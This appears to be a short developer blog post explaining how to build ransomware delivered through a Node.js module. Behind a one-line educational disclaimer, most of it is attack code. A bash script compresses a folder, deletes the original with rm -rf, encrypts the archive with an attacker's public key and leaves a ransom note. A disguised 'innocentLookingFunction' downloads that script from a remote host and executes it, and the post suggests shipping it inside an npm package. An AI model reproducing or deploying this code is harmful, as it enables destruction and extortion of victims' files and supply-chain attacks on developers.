---
title: TIL how to create randomware in nodejs
date: 2022-06-30
published: true
tags: ['security','hacking', 'node']
series: false
canonical_url: false
description: "As a developer, it's important to know the power we have in our hands, and how to execute and defend against it/avoid it. Running randomware attacks is illegal. "
layout: layouts/post.njk
---

This is for educational purposes only.

As a developer, it's important to know the power we have in our hands, and how to execute and defend against it/avoid it. Running randomware attacks is illegal.

## What does this do?

1 - A custom Node.js module fetches a shell script hosted on a cloud platform

2 - It creates a new file on the target's computer and executes it.

3 - The script navigates to a specific folder on the target's computer, compresses and encrypts that folder using asymmetric encryption.

In other words:
The target's files are encrypted using the attacker's public key and cannot be decrypted without this same person's private key. As a result, the only way for the target to get their files back is to pay the ransom to the attacker to get the private key.


## How to do it

1. You create a shell script.

```bash
# Navigates to a random folder
cd /Users/<your-username>/Desktop

# copies your public key to a key.pem file
echo "-----BEGIN PUBLIC KEY-----
<your-public-key>
-----END PUBLIC KEY-----" > key.pem

# tar stands for tape archive, is used to create Archive and extract the Archive files (like zip files)
# -czf stands for (c)ompress, g(z)ip compression type, and to create a (f)ilename for your achive.
tar -czf folder-to-encrypt.tar.gz folder-to-encrypt

# delete the original folder with rm (remove).
# -rf stands for (r)ecursive, and (f)orce.
rm -rf folder-to-encrypt

# The encryption part! This generates the private key and encrypts our .tar file!
openssl rsautl -encrypt -inkey key.pem -pubin -in folder-to-encrypt.tar.gz -out folder-to-encrypt.enc

# we then delete the original tar file, and leave only the encrypted version
rm -rf folder-to-encrypt.tar.gz

# Lastly, the random note
echo "You've been hacked! Gimme all the moneyz" > note.txt

```

So now you have a shell script ready to go! Where does node fit in?

```javascript

import fetch from "node-fetch"
import fs from "fs";

/// code to fetch our script remotely
async function download() {
    const res = await fetch('http://<some-site>/script.sh');
    await new Promise((resolve, reject) => {
        const fileStream = fs.createWriteStream('./script.sh');
        res.body.pipe(fileStream);
        fileStream.on("finish", function () {
            resolve();
        });
    });
}


// Execute it to run the attack.
const run = async () => {
    await download()
    execFile("bash", ["script.sh"]);
}

export default function innocentLookingFunction() {
    return run()
}
```

In order for this to work, the target must be willing to run your malicious code in some way.

That can be through giving them that node file and running it... `node evil-script.js`

Or packaging it inside a NPM library.

Overall, it's pretty scary stuff how quickly we can set this up! And one of those reasons why we should review npm libraries before adding them into our codebase.

via [Running a ransomware attack in a Node.js module](https://web.archive.org/web/20220609014009/https://dev.to/devdevcharlie/running-a-ransomware-attack-in-a-nodejs-module-4hgb)
